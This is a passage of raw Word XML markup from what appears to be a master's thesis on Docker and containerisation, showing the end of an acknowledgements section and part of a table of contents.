      <w:r w:rsidR="000B31BE">
        <w:t xml:space="preserve"> throughout </w:t>
      </w:r>
      <w:r w:rsidR="00203EB0">
        <w:t xml:space="preserve">the course of my </w:t>
      </w:r>
      <w:r w:rsidR="00090AB0">
        <w:t>master’s</w:t>
      </w:r>
      <w:r w:rsidR="00203EB0">
        <w:t xml:space="preserve"> degree.</w:t>
      </w:r>
      <w:r w:rsidR="002042C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB6330">
        <w:t>I would also</w:t>
      </w:r>
      <w:r w:rsidR="00B4513E">
        <w:t xml:space="preserve"> like to express gratitude to</w:t>
      </w:r>
      <w:r w:rsidR="00BB6330">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6073B" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dr Nitheesh </w:t>
      </w:r>
      <w:r w:rsidR="00C9730E" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kaliya</w:t>
      </w:r>
      <w:r w:rsidR="00CD1FD3" w:rsidRPr="00CD1FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>murthy</w:t>
      </w:r>
      <w:r w:rsidR="00CF767A">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00777946">
        <w:t>his mentorship and support.</w:t>
      </w:r>
      <w:r w:rsidR="00270696">
        <w:t xml:space="preserve"> Finally, I would like to thank my families and friends </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B64">
        <w:t>for their encouragement</w:t>
      </w:r>
      <w:r w:rsidR="00A62548">
        <w:t xml:space="preserve"> and support </w:t>
      </w:r>
      <w:r w:rsidR="001D7E2F">
        <w:t>all through my studies.</w:t>
      </w:r>
      <w:r w:rsidR="00A62548">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="-927350733"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="43CDEAB8" w14:textId="1CA0EAD1" w:rsidR="00876746" w:rsidRDefault="00876746">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A2DF512" w14:textId="721F19BA" w:rsidR="00E54087" w:rsidRDefault="0087674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6859242" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859242 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="001F98C5" w14:textId="428FE539" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859243" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 AIM</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859243 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57348040" w14:textId="51A5B9C7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859244" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 OBJECTIVES</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859244 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14290A6B" w14:textId="0E3ED1EE" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859245" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 STRUCTURE OF THE PROJECT</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="058173B5" w14:textId="5040BC1D" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859246" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 2</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> – BACKGROUND RESEARCH</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52408925" w14:textId="6AF6FAAA" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859247"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_Toc86859247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10DA3898" w14:textId="0EE0CDEA" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859249" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 VIRTUALISATION VS CONTAINERISATION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859249 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EB9E521" w14:textId="1E9C1867" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859250" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 DOCKER</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859250 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C97E885" w14:textId="07E75BFF" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859251" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 DOCKER ARCHITECTURE AND COMPONENTS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859251 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AC025BC" w14:textId="1A74B0A5" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859252" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Architecture</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859252 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48747AF5" w14:textId="0B405BA7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859253" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Docker Images</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859253 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="379DE4CB" w14:textId="31FB0771" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859254" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Containers</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859254 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F5F06C7" w14:textId="040E7EE1" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859255" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Registries</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859255 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
